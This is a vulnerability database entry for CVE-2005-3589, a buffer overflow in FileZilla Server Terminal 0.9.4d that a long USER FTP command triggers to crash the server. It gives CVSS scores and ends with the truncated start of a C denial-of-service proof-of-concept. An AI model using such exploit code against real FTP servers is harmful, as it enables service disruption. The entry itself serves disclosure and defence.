7.8
CVSSv2

CVE-2005-3589

Published: 16/11/2005 Updated: 19/10/2018
CVSS v2 Base Score: 7.8 | Impact Score: 6.9 | Exploitability Score: 10
VMScore: 785
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C

Vulnerability Summary

Buffer overflow in FileZilla Server Terminal 0.9.4d may allow remote malicious users to cause a denial of service (terminal crash) via a long USER ftp command.

Vulnerable Product Search on Vulmon Subscribe to Product

filezilla filezilla server terminal 0.9.4d

Exploits

/* FileZillaDoScpp FileZilla Server Terminal 094d DoS PoC by Inge Henriksen Read the disclaimer at ingehenriksenblogspotcom before using Made to work with Microsoft(R) Visual C++(R), to use link "WS2_32lib" */ #include "stdafxh" #include <iostream> #include "Winsock2h" #define BUFFSIZE 10000 #define ATTACK_BUFFSIZE 5000 u ...